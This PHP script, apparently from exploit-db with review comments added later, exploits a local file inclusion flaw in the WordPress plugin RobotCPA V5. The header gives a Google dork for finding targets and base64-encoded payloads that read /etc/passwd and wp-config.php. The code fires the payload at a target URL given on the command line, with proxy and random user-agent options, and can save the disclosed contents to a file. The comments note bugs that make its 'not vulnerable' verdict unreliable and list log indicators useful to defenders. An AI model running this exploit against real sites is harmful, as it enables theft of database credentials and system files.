<?php
# Switch off on-screen PHP error output for the whole run. Notices and fatal
# errors raised further down (undefined option indexes, unavailable functions)
# are therefore not printed, so an early, silent exit of this script is not a
# test result of any kind.
ini_set('display_errors', FALSE);

/*

Script-Exploit developed by CoderPirata
>BLOG    - http://coderpirata.blogspot.com/
>TWITTER - https://twitter.com/coderpirata

##################################################################################################
##################################################################################################
# Exploit Title: Wordpress Plugin RobotCPA V5 - Local File Include
# Google Dork: inurl:"/wp-content/plugins/robotcpa/"
# Date: 09.06.2015
# Exploit Author: T3N38R15
# Vendor Homepage: http://robot-cpa.good-info.co/
# Version: 5V
# Tested on: Windows (Firefox)
                   Linux      (Firefox)
The affected file is f.php; its GET parameter "l" is vulnerable to local file inclusion.
The injected value just needs to be base64-encoded.
Like this:
php://filter/resource=./../../../wp-config.php
cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==
or
file:///etc/passwd
ZmlsZTovLy9ldGMvcGFzc3dk
 
The injection then looks like this:
http://domain.com/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk
and we can see the content of the passwd file.
 
greets to Black Sniper
Regards T3N38R15
----
https://www.exploit-db.com/exploits/37252/
http://milw00rm.org/exploits/9136/
##################################################################################################
##################################################################################################
*/

# Command-line options: -u <url> (value required), --proxy <host:port> (value
# required), --save (value optional). getopt() returns only the options that
# were actually supplied, so $opt['proxy'] / $opt['save'] may be absent.
$opt = getopt("u:", ["proxy:", "save::"]);

#BANNER
# Printed on every run, before any argument validation takes place.
echo "
|::::[ RobotCP Local File Include (SCRIPT-EXPLOIT) ]::::|
| Author: T3N38R15                                      |
| Script-Exploit by CoderPirata                         |
'-------------------------------------------------------'\n
Simple usage : {$_SERVER["SCRIPT_NAME"]} -u http://target.com/wordpress/
Using proxy  : {$_SERVER["SCRIPT_NAME"]} -u http://target.com/wordpress/ --proxy 127.0.0.1:80
Saving result: {$_SERVER["SCRIPT_NAME"]} -u http://target.com/wordpress/ --save\n\n";

# No -u given: stop right after the banner, without any message.
if(!isset($opt['u'])){die();}
# $a is set here but never read again in this script; the save step at the end
# re-tests $opt['save'] directly.
if(isset($opt['save'])){$a=1;}
# Prepends "http://" when the text "http" occurs nowhere in the URL. This is a
# case-insensitive substring test, not a check of the URL scheme.
# NOTE(review): eregi() was deprecated in PHP 5.3 and removed in PHP 7.0, so on
# a current interpreter this line is a fatal error. Because display_errors is
# switched off at the top of the file, the run then ends with no verdict at
# all - which must not be read as "not vulnerable".
if(!eregi("http",$opt['u'])){$opt['u']="http://".$opt['u'];}

echo "---------------------------------------------------------\n\n";
# Only announces the missing cURL extension; the actual fallback is chosen in
# the fetch section further down.
if(!function_exists("curl_init")){ echo "\n\ncURL not available, file_get_contents will be used!\n\n"; }

echo "TARGET: {$opt["u"]}\nIP: ";

#IP - derive a host name from the URL and print the address it resolves to.
# Make sure the base URL ends in "/" so the regex below finds a closing slash.
if(substr($opt["u"],-1) != "/"){ $opt["u"] = $opt["u"]."/";}
# Captures everything between "://" and the next "/". A port or userinfo part
# of the URL, if present, ends up inside the capture as well.
preg_match_all("#://(.*?)/#", $opt["u"], $link_b, PREG_SET_ORDER); 
$basel=$link_b[0][1];
# NOTE(review): the test inspects the first four characters of the whole URL,
# which normally hold the scheme, so "www." is prepended in practically every
# case - also to hosts that already start with "www.". The IP printed below and
# the --save file name are built from this altered name and need not belong to
# the host that is actually requested.
if(substr(strtolower($opt["u"]), 0, 4) != "www."){$basel = "www.".$basel;}
# gethostbyname() performs a DNS lookup from the machine running the script and
# returns its argument unchanged when resolution fails.
echo gethostbyname($basel)."\n\nAnd... ";

#GRAB PAGE - send one GET request for the proof-of-concept path and keep the body.
# $resultado is initialised but not used anywhere else in this script.
$resultado=NULL;
# Path appended to the base URL. The value of "l" is the base64 form of
# file:///etc/passwd, as listed in the advisory text at the top of the file.
# For defenders: requests to /wp-content/plugins/robotcpa/f.php carrying a
# base64-looking "l" parameter are the access-log pattern this check produces.
$poc="/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk";
if(function_exists("curl_init")){
# Word list for a synthetic User-Agent header (see CURLOPT_USERAGENT below).
# Only indexes 0-15 can be selected there; the last two entries are never used.
$ua = array("Firefox", "Mobile", "Opera", "Tor Browser", "GoogleBot", "Internet Explorer",
             "Redhat Linux", "Ubuntu", "FreeBSD Linux", "CentOS Linux", "Android", "Debian Linux",
             "en-US", "pt-BR", "cs_CZ", "pt_PT", "ru_RU", "en_IN");
$ch = curl_init(); 
curl_setopt($ch, CURLOPT_URL, $opt["u"].$poc);
# Redirects are followed, so the body inspected later may come from a different
# URL than the one built above.
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
# Without --proxy this index does not exist; the loose comparison then sees
# null, the branch is skipped, and the resulting notice is hidden.
if($opt["proxy"]!=""){
 # Expects "host:port"; $pp[1] is undefined when no port was supplied.
 $pp = explode(":", $opt["proxy"]);
 curl_setopt($ch, CURLOPT_PROXY, $pp[0] );
 curl_setopt($ch, CURLOPT_PROXYPORT, $pp[1]);
}
# Certificate and host-name verification are both disabled: over HTTPS the
# response is unauthenticated, so the verdict below is only as trustworthy as
# the network path between this machine and the site.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
# Builds a header of the shape "<name>/<d>.<d> (<name>; <name>;)" from random
# list entries. The result does not resemble a real browser User-Agent string,
# which makes this shape a (weak) indicator in request logs.
curl_setopt($ch, CURLOPT_USERAGENT, $ua[rand(0,5)]."/".rand(0,5).".".rand(0,5)." (".$ua[rand(5,10)]."; ".$ua[rand(10,15)].";)");
# Return the body as a string instead of printing it; curl_exec() yields false
# when the transfer fails.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
$page = curl_exec($ch); 
curl_close($ch);
}elseif(empty($page) and function_exists("file_get_contents")){
 # Reached only when the cURL extension is missing ($page is still unset here).
 # NOTE(review): this call fetches the base URL without $poc and ignores
 # --proxy, so in this mode the check below inspects the site's start page and
 # its "NOT VULNERABLE" output carries no information about the plugin.
 $page = file_get_contents($opt["u"]);
}

#VERIFY - decide from the response body whether the file was disclosed.
# Both patterns are matched case-insensitively as POSIX regexes without
# delimiters, i.e. the literal texts "root:x:" and "/root:/", which occur in the
# root entry of a typical Linux passwd file. A FAIL therefore only means these
# markers were absent (failed request, non-Linux host, filtered response, ...);
# it does not prove the plugin is patched or removed.
# NOTE(review): eregi() no longer exists since PHP 7.0 (fatal error there).
if(eregi("root:x:",$page) or eregi("/root:/",$page)){
 echo "SUCESS!\nTHE TARGET IS VULNERABLE!\n\nLINK: ".$opt["u"].$poc."\n";
if(isset($opt["save"])){
 # The message is printed before the write and the return value of
 # file_put_contents() is not checked, so it appears even if saving fails.
 echo "\nRESULT SAVED IN \"".realpath(".").DIRECTORY_SEPARATOR.$basel.".txt\"\n";
 # Appends the raw response to <host>.txt in the current working directory.
 # The file then holds disclosed server content in plain text and accumulates
 # across runs (FILE_APPEND) - treat it as sensitive evidence.
 file_put_contents($basel.".txt", $page, FILE_APPEND); 
}
}else{
 echo "FAIL!\nTHE TARGET IS NOT VULNERABLE!\n\nLINK: ".$opt["u"].$poc."\n";
}
echo "\n----------\n";

#END

# siph0n [2015-06-27]